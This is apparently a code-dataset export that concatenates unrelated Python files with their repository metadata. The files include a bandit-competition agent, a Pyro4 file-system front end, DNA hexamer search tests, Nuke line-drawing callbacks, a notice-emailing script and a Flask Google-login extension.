self.bs_tid_56 = line_item(' Miscellaneous Short Term Liabilities',
55,
parent=self.bs_tid_51)
#############################
## Non-Current Liabilities ##
#############################
self.bs_tid_72 = line_item('Total Noncurrent Liabilities',
71,
parent=self.bs_tid_73)
#####################
## Debt & Children ##
#####################
self.bs_tid_58 = line_item('Long Term Debt',
57,
parent=self.bs_tid_72)
self.bs_tid_59 = line_item(' Long Term Borrowings',
58,
parent=self.bs_tid_58)
self.bs_tid_60 = line_item(' Long Term Capital Leases',
59,
parent=self.bs_tid_58)
######################
## Other & Children ##
######################
self.bs_tid_61 = line_item('Other Long Term Liabilities',
60,
parent=self.bs_tid_72)
self.bs_tid_62 = line_item(' Accrued Liabilities',
61,
parent=self.bs_tid_61)
self.bs_tid_66 = line_item(' Deferred Compensation',
65,
parent=self.bs_tid_61)
self.bs_tid_67 = line_item(' Deferred Revenue',
66,
parent=self.bs_tid_61)
self.bs_tid_68 = line_item(' Deferred Tax Liabilities',
67,
parent=self.bs_tid_61)
self.bs_tid_69 = line_item(' Derivatives & Hedging',
68,
parent=self.bs_tid_61)
self.bs_tid_70 = line_item(' Discontinued Operations',
69,
parent=self.bs_tid_61)
self.bs_tid_71 = line_item(' Miscellaneous Long Term Liabilities',
70,
parent=self.bs_tid_61)
#########################
## Continued, Pensions ##
#########################
self.bs_tid_63 = line_item(' Pension Liabilities',
62,
parent=self.bs_tid_61)
self.bs_tid_64 = line_item(' Pensions',
63,
parent=self.bs_tid_63)
self.bs_tid_65 = line_item(' Other Post-Retirement Benefits',
64,
parent=self.bs_tid_63)
#############
## Equity ##
#############
self.bs_tid_84 = line_item('Total Equity',
83,
parent=self.bs_tid_85)
self.bs_tid_83 = line_item('Minority Interest',
82,
parent=self.bs_tid_84)
#####################################
## Equity Before Minority Interest ##
#####################################
self.bs_tid_82 = line_item('Equity Before Minority Interest',
81,
parent=self.bs_tid_84)
self.bs_tid_74 = line_item(' Preferred Equity',
73,
parent=self.bs_tid_82)
self.bs_tid_79 = line_item(' Treasury Stock',
78,
parent=self.bs_tid_82)
self.bs_tid_80 = line_item(' Retained Earnings',
79,
parent=self.bs_tid_82)
self.bs_tid_81 = line_item(' Other Equity',
80,
parent=self.bs_tid_82)
##############################
## Continued, Issued Equity ##
##############################
self.bs_tid_75 = line_item('Share Capital & Additional Paid-In Capital',
74,
parent=self.bs_tid_82)
self.bs_tid_76 = line_item(' Common Stock',
75,
parent=self.bs_tid_75)
self.bs_tid_77 = line_item(' Additional Paid in Capital',
76,
parent=self.bs_tid_75)
self.bs_tid_78 = line_item(' Other Share Capital',
77,
parent=self.bs_tid_75)
if data:
self.add_data(data)
| 49.500644
| 89
| 0.371094
| 38,427
| 0.99909
| 0
| 0
| 0
| 0
| 0
| 0
| 11,730
| 0.304976
|
36abdd1471f5a742fa98e77ecb26e8e8f6f70696
| 4,127
|
py
|
Python
|
agents/ag_useHisExplorDecayedP.py
|
a-pedram/kaggle-mab
|
5d9d6d47541f6b71a5a886146928aa57a5c77591
|
[
"MIT"
] | null | null | null |
agents/ag_useHisExplorDecayedP.py
|
a-pedram/kaggle-mab
|
5d9d6d47541f6b71a5a886146928aa57a5c77591
|
[
"MIT"
] | null | null | null |
agents/ag_useHisExplorDecayedP.py
|
a-pedram/kaggle-mab
|
5d9d6d47541f6b71a5a886146928aa57a5c77591
|
[
"MIT"
] | null | null | null |
import numpy as np
from collections import Counter
decay_rate = 0.97
n_rounds = 2000
bandit_count = 100
total_reward = None
last_bandit = None
last_reward = None
his_hits = None
his_record = None
my_record = None
my_hits = None
wins = None
losses = None
bandits_record = None
record_index = None
x1 = None
x2 = None
sp = np.linspace(0,1,1000)
spp = 1 - sp
def probab(n_ones,n_zeros):
global sp, spp
cdfBeta = np.cumsum(sp**n_ones * spp **n_zeros )
place = np.argmin(np.abs(cdfBeta - cdfBeta[999] / 2 ))
return sp[place] + np.random.rand() * 0.0001
def decayed_probab(n_ones, n_zeros, his_n):
global sp, spp
ps = sp**n_ones * spp **n_zeros
limit = int(1000 * decay_rate**(his_n + n_ones + n_zeros + 1 ) )
cdfBeta = np.cumsum(ps[:limit] )
place = np.argmin(np.abs(cdfBeta - cdfBeta[-1] / 2 ))
return sp[place] + np.random.rand() * 0.0001
myProbabs = np.random.rand(bandit_count)* 0.001 + 0.5
n_lookback = 4
def new_bandit(step):
global bandits_record, his_hits, his_record, last_bandit, myProbabs
his_choice = his_record[step-1]
myProbabs[last_bandit] = decayed_probab(wins[last_bandit],losses[last_bandit],his_hits[last_bandit])
myProbabs[his_choice] = decayed_probab(wins[his_choice],losses[his_choice],his_hits[his_choice])
scores = myProbabs + 3 / (losses +1)
if step < n_lookback:
n_back = step
else:
n_back = n_lookback
his_last_moves = his_record[step - n_back:step]
move_counts = Counter(his_last_moves)
his_winner_wins = move_counts.most_common()[0][1]
his_winner = int(move_counts.most_common()[0][0])
# print('step',step)
# print('his record',his_record,'his_last_moves',his_last_moves)
# print('his choice:',his_winner,'his choice win:',his_winner_wins,'his move counts',move_counts,'his hits',his_hits)
# print('my hits',my_hits)
if step < 1000:
if my_hits[his_winner] <= 3 and his_winner_wins > 1 and my_hits[his_winner] < his_hits[his_winner]:
if his_winner == his_record[step-2]:
# print("his winner11!!!!")
return his_winner
else:
if his_winner == last_bandit and last_reward == 1 :
# print("his winner22!!!!")
return his_winner
else:
if his_winner == last_bandit and last_reward == 1 :
# print("his winner333!!!!")
return his_winner
winner = int(np.argmax(scores))
#winner = int(scores.argsort()[-2:][np.random.randint(2)])
# print("My winner!!!!")
return winner
def agent(obs, conf):
global bandits_record, my_record, my_hits, his_hits, his_record, myProbabs
global last_bandit, total_reward, record_index, wins, losses, last_reward
if obs.step == 0:
total_reward = 0
his_record = np.zeros(n_rounds, 'int')
his_hits = np.zeros(conf.banditCount, 'int')
myProbabs = np.random.rand(bandit_count)* 0.001 + 0.5
my_record = np.zeros(n_rounds, 'int')
my_hits = np.zeros(conf.banditCount, 'int')
bandits_record = np.zeros([400, conf.banditCount], 'int')
record_index = np.zeros(conf.banditCount,'int')
wins = np.zeros(conf.banditCount, 'int')
losses = np.zeros(conf.banditCount, 'int')
bandit = np.random.randint(conf.banditCount)
last_bandit = bandit
return bandit
if obs.lastActions[0] == last_bandit:
his_action = obs.lastActions[1]
else:
his_action = obs.lastActions[0]
his_record[obs.step-1] = his_action
his_hits[his_action] += 1
my_hits[last_bandit] += 1
my_record[obs.step-1] = last_bandit
if obs.reward > total_reward:
total_reward += 1
bandits_record[record_index[last_bandit], last_bandit] = 1
wins[last_bandit] += 1
last_reward = 1
else:
bandits_record[record_index[last_bandit], last_bandit] = 0
losses[last_bandit] +=1
last_reward = 0
record_index[last_bandit] += 1
bandit = new_bandit(obs.step)
last_bandit = bandit
return bandit
| 35.886957
| 121
| 0.642598
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 431
| 0.104434
|
36ac48e2ab27df3c0677dca73c8d8951f0e9ae52
| 1,156
|
py
|
Python
|
principles-of-computing/Practice Exercises/Solitaire Mancala/Solitaire Mancala/poc_simpletest.py
|
kingwatam/misc-python
|
8a10f14eb79b9d93bbe889175fe5ab532da73c70
|
[
"MIT"
] | 1
|
2019-09-03T03:47:39.000Z
|
2019-09-03T03:47:39.000Z
|
principles-of-computing/Practice Exercises/Solitaire Mancala/Solitaire Mancala/poc_simpletest.py
|
kingwatam/misc-python
|
8a10f14eb79b9d93bbe889175fe5ab532da73c70
|
[
"MIT"
] | null | null | null |
principles-of-computing/Practice Exercises/Solitaire Mancala/Solitaire Mancala/poc_simpletest.py
|
kingwatam/misc-python
|
8a10f14eb79b9d93bbe889175fe5ab532da73c70
|
[
"MIT"
] | null | null | null |
"""
Lightweight testing class inspired by unittest from Pyunit
https://docs.python.org/2/library/unittest.html
Note that code is designed to be much simpler than unittest
and does NOT replicate uinittest functionality
"""
class TestSuite:
"""
Create a suite of tests similar to unittest
"""
def __init__(self):
"""
Creates a test suite object
"""
self.total_tests = 0
self.failures = 0
def run_test(self, computed, expected, message = ""):
"""
Compare computed and expected expressions as strings
If not equal, print message, computed, expected
"""
self.total_tests += 1
if computed != expected:
print message + " Computed: " + str(computed) + \
" Expected: " + str(expected)
self.failures += 1
def report_results(self):
""""
Report back summary of successes and failures
from run_test()
"""
print "Ran " + str(self.total_tests) + " tests. " \
+ str(self.failures) + " failures."
| 31.243243
| 62
| 0.554498
| 926
| 0.801038
| 0
| 0
| 0
| 0
| 0
| 0
| 628
| 0.543253
|
36ad7dd9946b30b8edbad769fd9fe67f2dcb1c2d
| 2,014
|
py
|
Python
|
jwc_core/jwc_sender.py
|
Inetgeek/Notice-Pusher
|
052e4ecbf7520ae93e16af6ae89f560d6a6d888a
|
[
"MIT"
] | 2
|
2021-09-16T04:19:52.000Z
|
2022-03-28T03:48:29.000Z
|
jwc_core/jwc_sender.py
|
Inetgeek/Notice-Pusher
|
052e4ecbf7520ae93e16af6ae89f560d6a6d888a
|
[
"MIT"
] | null | null | null |
jwc_core/jwc_sender.py
|
Inetgeek/Notice-Pusher
|
052e4ecbf7520ae93e16af6ae89f560d6a6d888a
|
[
"MIT"
] | 1
|
2021-09-16T04:21:08.000Z
|
2021-09-16T04:21:08.000Z
|
#!/usr/bin/python3
# coding: utf-8
import sys
import os, time, datetime
import smtplib
from email import (header)
from email.mime import (text, multipart)
with open(r'/home/jwc_notice.txt', "r+", encoding="utf-8") as file: #自行更改路径
a = file.read()
send_title = "机器人风险提示"
send_head = '<p style="color:#507383">亲爱的主人:</p>'
send_content = '<p style="font-size:34px;color:#ca1b0f;"><span style="border-bottom: 1px dashed #ccc; z-index: 1; position: static;">账号被风控,请及时处理!</span></p>'+'<hr><p style="color:#FC5531">教务处通知为:<p>\n\n'+a
def sender_mail():
smtp_Obj = smtplib.SMTP_SSL('smtp.qq.com',465)
sender_addrs = 'xxxxxx'
password = "xxxxxx"
smtp_Obj.login(sender_addrs, password)
receiver_addrs = ['xxxxxx']
for email_addrs in receiver_addrs:
try:
msg = multipart.MIMEMultipart()
msg['From'] = "InetGeek"
msg['To'] = email_addrs
msg['subject'] = header.Header(send_title, 'utf-8')
msg.attach(text.MIMEText(send_content, 'html', 'utf-8'))
smtp_Obj.sendmail(sender_addrs, email_addrs, msg.as_string())
print('成功发送给%s' % ( email_addrs))
except Exception as e:
continue
smtp_Obj.quit()
Nowtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
# @scheduler.scheduled_job('cron', hour = 22,minute = 50)
async def _init_():#个人自用请去掉异步io(删掉async)
with open(r'/home/jwc_notice.txt', "r+", encoding="utf-8") as file:
a = file.read()
if len(a) > 0:
try:#下面两句句替换成你要发送的方式,如采用微信推送则换成push+的发送接口,不要直接用下面两行代码
await bot.send_msg(user_id=1xxxxxxx2, message=a+'\n'+'\n当前时间: '+Nowtime)
await bot.send_group_msg(group_id=2xxxxxxxx7, message=a+'\n [CQ:at,qq=all]'+'\n当前时间: '+Nowtime)
file.seek(0)
file.truncate()
except:
sender_mail()
file.seek(0)
file.truncate()
sys.exit()
if __name__ == '__main__':
_init_()
| 36.618182
| 205
| 0.600298
| 0
| 0
| 0
| 0
| 0
| 0
| 745
| 0.335888
| 839
| 0.378269
|
36adec35d9afaf6063824fc88cc7373dff86a943
| 6,328
|
py
|
Python
|
distributed_systems/ftp/frontend.py
|
JRhodes95/net-sys-cw
|
926ea3b133416c4a6f8065be5caa34a5e5b49878
|
[
"MIT"
] | null | null | null |
distributed_systems/ftp/frontend.py
|
JRhodes95/net-sys-cw
|
926ea3b133416c4a6f8065be5caa34a5e5b49878
|
[
"MIT"
] | null | null | null |
distributed_systems/ftp/frontend.py
|
JRhodes95/net-sys-cw
|
926ea3b133416c4a6f8065be5caa34a5e5b49878
|
[
"MIT"
] | null | null | null |
import os
os.environ["PYRO_LOGFILE"] = "pyro.log"
os.environ["PYRO_LOGLEVEL"] = "DEBUG"
import Pyro4
import Pyro4.util
import Pyro4.naming
import sys
import pprint
"""
Front end controller for the 2017/18 Networks and Distributed Systems
Summative Assignment.
Author: Z0954757
"""
sys.excepthook = Pyro4.util.excepthook
pp = pprint.PrettyPrinter()
def main():
"""Main function to initiate the front end, expose it to the network, and
find any servers.
"""
frontend = FrontEnd()
frontend.find_servers()
with Pyro4.Daemon() as daemon:
frontend_uri = daemon.register(frontend)
with Pyro4.locateNS() as ns:
ns.register("filesystem.frontend", frontend_uri)
print("Frontend available.")
daemon.requestLoop()
@Pyro4.expose
class FrontEnd(object):
"""Class to represent the front end controller. This class accepts
connections from a client application, decides the appropriate action to
perform, dispatches commands to the servers on the file system.
"""
def __init__(self):
self.active_servers = []
def find_servers(self):
"""Method to find any servers existing on the network using the Pryo
Naming Server to lookup servers.
"""
with Pyro4.locateNS() as ns:
for server, server_uri in ns.list(prefix="filesystem.fileserver.").items():
print("Found server at: {0}".format(server))
self.active_servers.append(Pyro4.Proxy(server_uri))
if not self.active_servers:
raise ValueError("No servers found! (Have you started the servers first?)")
def connect_client(self,client_name):
"""Method called by the client to initiate a connection between the two.
"""
print("Client {0} connected.".format(client_name))
return "Hello {0}, you are now connected to the file system.".format(client_name)
def list_all(self):
"""Method called by the client list all the files on the file system.
Queries all currently connected servers for files and returns them as a
single list to the client, removing duplicate instances where a file is
sotred on multiple servers.
"""
raw_file_list = []
for server in self.active_servers:
server_contents = server.list_contents()
raw_file_list.append(server_contents)
flat_file_list = [item for sublist in raw_file_list for item in sublist]
#remove duplicates
file_list = list(set(flat_file_list))
return file_list
def delete_file(self, file_name):
"""Method called by the client to delete a file stored on the system.
Queries all currently connected servers and deletes the file if it
exists there, ensuringthat the file is removed on all servers.
"""
print("Deleting file: {0}".format(file_name))
deleted = False
print("Searching for file on servers...")
for server in self.active_servers:
server_contents = server.list_contents()
if file_name in server_contents:
print("Found file on server.")
response = server.delete_file(file_name)
if response == "File deleted.":
deleted = True
elif response == "File not found on server.":
continue
if deleted == True:
return "File deleted."
else:
return "File not found on file system."
def upload_file_low(self, file_name):
"""Method called by the client to upload a file in the low reliability
mode whereby the file is uploaded to the server with the fewest files.
"""
print("Starting upload sequence.")
print("Checking if file exists on system.")
file_list = self.list_all()
if file_name in file_list:
return "File already exists on system."
else:
print("No matching file on system")
print("Low reliability upload.")
print("Looking for least full server.")
server_least_files = (self.active_servers[0], len(self.active_servers[0].list_contents()))
for i in range(1, len(self.active_servers)):
server = self.active_servers[i]
server_no_files = len(server.list_contents())
if server_least_files[1] > server_no_files:
server_least_files = (server, server_no_files)
print("Preparing server for upload process: server_{0}".format(server_least_files[0].get_name()))
response = server_least_files[0].init_upload(file_name)
if response == "Failed to initate server, see server log for details.":
print(response)
return response
else:
print(response)
return response
def upload_file_high(self, file_name, status):
"""Method called by the client to upload a file in high reliability
mode whereby the file is uploaded to all servers attached to the system.
"""
if status == 'start':
print("High reliability upload process started.")
no_servers = len(self.active_servers)
return no_servers
else:
response = self.active_servers[status].init_upload_high(file_name)
return response
def download_file(self, file_name):
"""Method called by the client to download a file from the system.
Searches the active servers and initiates the download from the first
it finds containing the specified file.
"""
print("Starting download process.")
print("Checking if file exists on system.")
file_list = self.list_all()
if file_name not in file_list:
return "File not on system. Use LIST to check available files."
else:
print("Looking for server containing file.")
for server in self.active_servers:
if file_name in server.list_contents():
print("Found file, readying server.")
response = server.init_download()
return response
if __name__ == "__main__":
main()
| 34.769231
| 109
| 0.62658
| 5,493
| 0.868047
| 0
| 0
| 5,507
| 0.870259
| 0
| 0
| 2,655
| 0.419564
|
36ae9333eaabebfa5f7eb2cc25d299b4c6d41d73
| 4,501
|
py
|
Python
|
tests/test_hexamer/test_search_hexamer.py
|
zyxue/kleat3
|
861b02797937eea51e99f9c29d195fb3e7dea376
|
[
"MIT"
] | null | null | null |
tests/test_hexamer/test_search_hexamer.py
|
zyxue/kleat3
|
861b02797937eea51e99f9c29d195fb3e7dea376
|
[
"MIT"
] | null | null | null |
tests/test_hexamer/test_search_hexamer.py
|
zyxue/kleat3
|
861b02797937eea51e99f9c29d195fb3e7dea376
|
[
"MIT"
] | null | null | null |
import unittest
from kleat.hexamer.search import plus_search, minus_search, search
from kleat.hexamer.hexamer import extract_seq
class TestSearchHexamer(unittest.TestCase):
def test_plus_search(self):
self.assertEqual(plus_search('GGGAATAAAG', 9), ('AATAAA', 16, 3))
self.assertEqual(plus_search('GGGAATAAA', 9), ('AATAAA', 16, 4))
self.assertEqual(plus_search('GGGAATAAAGG', 9), ('AATAAA', 16, 2))
self.assertEqual(plus_search('GGGATTAAAGG', 9), ('ATTAAA', 15, 2))
self.assertEqual(plus_search('GGGAATAA', 9), None)
self.assertEqual(plus_search('GAATAAAC', 10), ('AATAAA', 16, 4))
self.assertEqual(plus_search('GGGGCTAC', 20), ('GGGGCT', 1, 13))
self.assertEqual(plus_search('GTTTATTC', 6), None)
def test_plus_search_lowercase(self):
seq = 'GAATaaaC'
# 4567890
# 1
self.assertEqual(plus_search(seq, 10), ('AATAAA', 16, 4))
def test_plus_search_take_right_most_hexamer(self):
self.assertEqual(plus_search('CAATAAANAATAAAC', 200), ('AATAAA', 16, 194))
def test_plus_search_take_right_most_hexamer_with_Ns(self):
self.assertEqual(plus_search('GCATTAAAAATNAAC', 200), ('ATTAAA', 15, 188))
def test_plus_search_take_the_strongest_hexamer(self):
self.assertEqual(plus_search('GCAATAAAATTAAAC', 200), ('AATAAA', 16, 188))
def test_minus_search(self):
seq = 'ATTTATTCCC'
# 90123456789 <- one coord
# 1 <- ten coord
self.assertEqual(minus_search(seq, 9), ('AATAAA', 16, 15))
seq = 'ATTTAATCCC'
# 90123456789 <- one coord
# 1 <- ten coord
self.assertEqual(minus_search(seq, 9), ('ATTAAA', 15, 15))
self.assertEqual(minus_search('GTTTATTC', 1), ('AATAAA', 16, 7))
self.assertEqual(minus_search('ATCGTATATTGC', 5), ('AATATA', 10, 14))
def test_minus_search_lowercase(self):
self.assertEqual(minus_search('GTttattc', 1), ('AATAAA', 16, 7))
def test_minus_search_take_left_most_hexamer(self):
self.assertEqual(minus_search('GTTTATTTTTATTCG', 10), ('AATAAA', 16, 16))
def test_minus_search_take_left_most_hexamer_with_Ns(self):
self.assertEqual(minus_search('GTTTATTNTTTATTNNNTGTATTCG', 10), ('AATAAA', 16, 16))
def test_minus_search_take_the_strongest_hexamer(self):
self.assertEqual(minus_search('GTTTAATNTTTATTNNNTGTATTCG', 20), ('AATAAA', 16, 33))
def test_minus_search_take_the_strongest_hexamer_in_lower_case(self):
self.assertEqual(minus_search('gtttaatntttattnnntgtattcg', 20), ('AATAAA', 16, 33))
class TestSearch(unittest.TestCase):
def test_plus_strand(self):
"""
CaataaaGT
0123456789 <-genome coord
| |
PAS clv
"""
seq = 'CaataaaGT'
clv = 9
self.assertEqual(search('+', clv, seq, 50), ('AATAAA', 16, 2))
def test_minus_strand(self):
"""
GGTTTATT
0123456789 <-genome coord
| |
clv PAS
"""
seq = 'GGTTTATT'
clv = 1
self.assertEqual(search('-', clv, seq, 50), ('AATAAA', 16, 8))
# Good drawing example, utilize them later
# def test_extract_seq_where_for_plus_strand_clv_supported_by_suffix():
# """
# AATAAA AA <-tail of suffix contig
# ACGG┘||||└CGGCC┘ <-suffix contig
# 0123456789012345 <-contig coord
# 1 |
# ...7890123456789012... <-genome coord
# 1 2|
# ^ref_clv
# """
# clv = 11
# strand = '+'
# contig = MagicMock()
# contig.query_sequence = 'ACGGAATAAACGGCCAA'
# contig.cigartuples = ((S.BAM_CMATCH, 15), (S.BAM_CSOFT_CLIP, 2))
# ref_fa = MagicMock()
# assert extract_seq(contig, strand, clv, ref_fa) == 'ACGGAATAAACGGCC'
# def test_extract_seq_where_for_minus_strand_clv_supported_by_suffix():
# """
# TTT TTTATT <-tail of suffix contig
# └AC┘||||└CGGC <-suffix contig
# 012345678901 <-contig coord
# | 1
# ...890123456789... <-genome coord
# | 1
# ^ref_clv
# """
# clv = 11
# strand = '+'
# contig = MagicMock()
# contig.query_sequence = 'TTACTTTATTCGC'
# contig.cigartuples = ((S.BAM_CMATCH, 15), (S.BAM_CSOFT_CLIP, 2))
# ref_fa = MagicMock()
# assert extract_seq(contig, strand, clv, ref_fa) == 'ACTTTATTCGC'
| 36.008
| 91
| 0.608309
| 3,074
| 0.681143
| 0
| 0
| 0
| 0
| 0
| 0
| 2,130
| 0.47197
|
36afd304529f60846fb23519859a8bcc5c007db7
| 3,825
|
py
|
Python
|
_mod_Community/LineDrawer/Lines_Callbacks.py
|
tianlunjiang/_NukeStudio_v2
|
5ed9b9217aff16d903bdcda5c2f1e1cd3bebe367
|
[
"CNRI-Python"
] | 6
|
2019-08-27T01:30:15.000Z
|
2020-11-17T00:40:01.000Z
|
_mod_Community/LineDrawer/Lines_Callbacks.py
|
tianlunjiang/_NukeMods
|
47861bfc273262abba55b9f9a61782a5d89479b1
|
[
"CNRI-Python"
] | 2
|
2019-01-22T04:09:28.000Z
|
2019-01-23T15:11:39.000Z
|
_mod_Community/LineDrawer/Lines_Callbacks.py
|
tianlunjiang/_NukeMods
|
47861bfc273262abba55b9f9a61782a5d89479b1
|
[
"CNRI-Python"
] | 1
|
2020-08-03T22:43:23.000Z
|
2020-08-03T22:43:23.000Z
|
import nuke
def delete_pt():
max_pts = int(nuke.thisNode().knob('Max PTS').value()) - 1
if max_pts < 2:
nuke.message('Minimum 2 points')
return
pt_num = int(nuke.thisKnob().name()[6:])
node = nuke.thisNode()
for pt in xrange(pt_num, max_pts):
knob_name = 'pt' + str(pt)
next_knob = 'pt' + str(pt + 1)
next_value = node.knob(next_knob).value()
node.knob(knob_name).setValue(next_value)
node.knob('pt' + str(max_pts)).setValue([0, 0])
for name in ('pt', 'delete', 'insert'):
node.knobs()[name + str(max_pts)].setVisible(False)
node.knob('Max PTS').setValue(max_pts)
def insert_pt():
max_pts = int(nuke.thisNode().knob('Max PTS').value())
MAX_POINTS = int(nuke.thisNode().knob('Max Limit').value())
if max_pts >= MAX_POINTS:
nuke.message('Maximum %i points' % (MAX_POINTS))
return
pt_num = int(nuke.thisKnob().name()[6:])
node = nuke.thisNode()
# Shuffle values upwards
for pt in xrange(max_pts, pt_num, -1):
knob_name = 'pt' + str(pt)
prev_knob = 'pt' + str(pt - 1)
prev_value = node.knob(prev_knob).value()
node.knob(knob_name).setValue(prev_value)
# Set new position to midpoint of adjacent points
if pt_num > 1:
ptA = node.knob('pt' + str(pt_num - 1)).value()
else:
ptA = node.knob('Start').value()
ptB = node.knob('pt' + str(pt_num + 1)).value()
midpoint = [sum(x) / 2 for x in zip(ptA, ptB)]
node.knob('pt' + str(pt_num)).setValue(midpoint)
# Reveal next row
for name in ('pt', 'delete', 'insert'):
node.knobs()[name + str(max_pts)].setVisible(True)
node.knob('Max PTS').setValue(max_pts + 1)
def add_pt():
max_pts = int(nuke.thisNode().knob('Max PTS').value())
MAX_POINTS = int(nuke.thisNode().knob('Max Limit').value())
if max_pts >= MAX_POINTS:
nuke.message('Maximum %i points' % (MAX_POINTS))
return
node = nuke.thisNode()
for name in ('pt', 'delete', 'insert'):
node.knobs()[name + str(max_pts)].setVisible(True)
node.knob('Max PTS').setValue(max_pts + 1)
def initialiseNode(node, max_num=4):
node.knob(node.name()).setLabel('Appearance')
knob_names = [x for x in node.knobs().keys() if x.startswith('pt')]
knob_names.sort(key=lambda x: int(x[2:]))
# Add new Tab for points
start_knob = node.knobs()['Start']
node.removeKnob(start_knob)
node.addKnob(nuke.Tab_Knob('Points'))
text = "Insert adds a point between its adjacent and previous point\nDelete removes the adjacent point\nAdd adds a point at the end"
node.addKnob(nuke.Text_Knob('info', '', text))
node.addKnob(nuke.Text_Knob('', ''))
node.addKnob(start_knob)
# Remove and store all pt knobs
knobs = []
for name in knob_names:
knob = node.knobs()[name]
knobs.append(knob)
node.removeKnob(knob)
# Add each back along with their delete and insert buttons
for knob in knobs:
num = knob.name()[2:]
delete = nuke.PyScript_Knob('delete' + num, 'Delete', "Lines_Callbacks.delete_pt()")
insert = nuke.PyScript_Knob('insert' + num, 'Insert', "Lines_Callbacks.insert_pt()")
# Hide knobs greater than the max value
if int(num) >= max_num:
knob.setVisible(False)
delete.setVisible(False)
insert.setVisible(False)
node.addKnob(knob)
node.addKnob(delete)
node.addKnob(insert)
# Add the Add knob
add_knob = nuke.PyScript_Knob('add_pt', 'Add', "Lines_Callbacks.add_pt()")
add_knob.setFlag(nuke.STARTLINE)
node.addKnob(add_knob)
node.knob('Max PTS').setValue(max_num)
node.knobs()['Max PTS'].setVisible(False)
node.knobs()['Max Limit'].setVisible(False)
| 30.11811
| 136
| 0.614641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 817
| 0.213595
|
36b0624ad538450600494ca8e1dbfc5af431fa64
| 907
|
py
|
Python
|
臺灣言語平臺/management/commands/加sheet的json.py
|
sih4sing5hong5/tai5-uan5_gian5-gi2_phing5-tai5
|
26f93e06176d8637556938d635a2e101ae7eb1ab
|
[
"MIT"
] | 14
|
2016-03-22T15:02:06.000Z
|
2018-10-10T02:08:25.000Z
|
臺灣言語平臺/management/commands/加sheet的json.py
|
sih4sing5hong5/tai5-uan5_gian5-gi2_gi2-liau7_phing5-thai5
|
26f93e06176d8637556938d635a2e101ae7eb1ab
|
[
"MIT"
] | 160
|
2015-10-15T10:34:39.000Z
|
2019-03-03T11:54:02.000Z
|
臺灣言語平臺/management/commands/加sheet的json.py
|
sih4sing5hong5/tai5-uan5_gian5-gi2_gi2-liau7_phing5-thai5
|
26f93e06176d8637556938d635a2e101ae7eb1ab
|
[
"MIT"
] | 5
|
2016-06-19T13:41:08.000Z
|
2020-12-15T06:58:06.000Z
|
import json
from django.core.management.base import BaseCommand
from 臺灣言語平臺.正規化團隊模型 import 正規化sheet表
from django.conf import settings
class Command(BaseCommand):
help = '加sheet的json'
def add_arguments(self, parser):
parser.add_argument(
'服務帳戶json',
type=str,
help='google developers console下載的服務帳戶json'
)
parser.add_argument(
'網址',
type=str,
help='google sheet的網址'
)
def handle(self, *args, **參數):
with open(參數['服務帳戶json']) as 檔案:
服務帳戶資料 = json.load(檔案)
正規化sheet表.加sheet(
語言腔口=settings.MOTHER_TONGUE,
key_file_name=參數['服務帳戶json'],
url=參數['網址'],
)
self.stdout.write(
'愛記得到「Google Sheets右上角的Share」裡分享「Can edit」的權限予 {} 喲!!'.format(
服務帳戶資料['client_email']
)
)
| 23.868421
| 74
| 0.55237
| 933
| 0.842818
| 0
| 0
| 0
| 0
| 0
| 0
| 274
| 0.247516
|
36b163e4e896ecc59896f84da3ea4de1f6c5f0dd
| 6,851
|
py
|
Python
|
flask_googlelogin.py
|
leakim34/flask-googlelogin
|
67346d232414fdba7283f516cb7540d41134d175
|
[
"MIT"
] | 35
|
2015-01-28T16:13:55.000Z
|
2022-02-12T20:53:32.000Z
|
flask_googlelogin.py
|
fnokeke/flask-googlelogin
|
67346d232414fdba7283f516cb7540d41134d175
|
[
"MIT"
] | 4
|
2015-08-14T13:33:47.000Z
|
2018-12-04T10:33:17.000Z
|
flask_googlelogin.py
|
fnokeke/flask-googlelogin
|
67346d232414fdba7283f516cb7540d41134d175
|
[
"MIT"
] | 29
|
2015-01-28T10:23:47.000Z
|
2022-02-12T20:53:34.000Z
|
"""
Flask-GoogleLogin
"""
from base64 import (urlsafe_b64encode as b64encode,
urlsafe_b64decode as b64decode)
from urllib import urlencode
from urlparse import parse_qsl
from functools import wraps
from flask import request, redirect, abort, current_app, url_for
from flask_login import LoginManager, make_secure_token
import requests
GOOGLE_OAUTH2_AUTH_URL = 'https://accounts.google.com/o/oauth2/auth'
GOOGLE_OAUTH2_TOKEN_URL = 'https://accounts.google.com/o/oauth2/token'
GOOGLE_OAUTH2_USERINFO_URL = 'https://www.googleapis.com/oauth2/v2/userinfo'
USERINFO_EMAIL_SCOPE = 'https://www.googleapis.com/auth/userinfo.email'
USERINFO_PROFILE_SCOPE = 'https://www.googleapis.com/auth/userinfo.profile'
class GoogleLogin(object):
"""
Main extension class
"""
def __init__(self, app=None, login_manager=None):
if login_manager:
self.login_manager = login_manager
else:
self.login_manager = LoginManager()
if app:
self._app = app
self.init_app(app)
def init_app(self, app, add_context_processor=True):
"""
Initialize with app configuration
"""
# Check if login manager has been initialized
if not hasattr(app, 'login_manager'):
self.login_manager.init_app(
app,
add_context_processor=add_context_processor)
# Clear flashed messages since we redirect to auth immediately
self.login_manager.login_message = None
self.login_manager.needs_refresh_message = None
# Set default unauthorized callback
self.login_manager.unauthorized_handler(self.unauthorized_callback)
@property
def app(self):
return getattr(self, '_app', current_app)
@property
def scopes(self):
return self.app.config.get('GOOGLE_LOGIN_SCOPES', '')
@property
def client_id(self):
return self.app.config['GOOGLE_LOGIN_CLIENT_ID']
@property
def client_secret(self):
return self.app.config['GOOGLE_LOGIN_CLIENT_SECRET']
@property
def redirect_uri(self):
return self.app.config.get('GOOGLE_LOGIN_REDIRECT_URI')
@property
def redirect_scheme(self):
return self.app.config.get('GOOGLE_LOGIN_REDIRECT_SCHEME', 'http')
def sign_params(self, params):
return b64encode(urlencode(dict(sig=make_secure_token(**params),
**params)))
def parse_state(self, state):
return dict(parse_qsl(b64decode(str(state))))
def login_url(self, params=None, **kwargs):
"""
Return login url with params encoded in state
Available Google auth server params:
response_type: code, token
prompt: none, select_account, consent
approval_prompt: force, auto
access_type: online, offline
scopes: string (separated with commas) or list
redirect_uri: string
login_hint: string
"""
kwargs.setdefault('response_type', 'code')
kwargs.setdefault('access_type', 'online')
if 'prompt' not in kwargs:
kwargs.setdefault('approval_prompt', 'auto')
scopes = kwargs.pop('scopes', self.scopes.split(','))
if USERINFO_PROFILE_SCOPE not in scopes:
scopes.append(USERINFO_PROFILE_SCOPE)
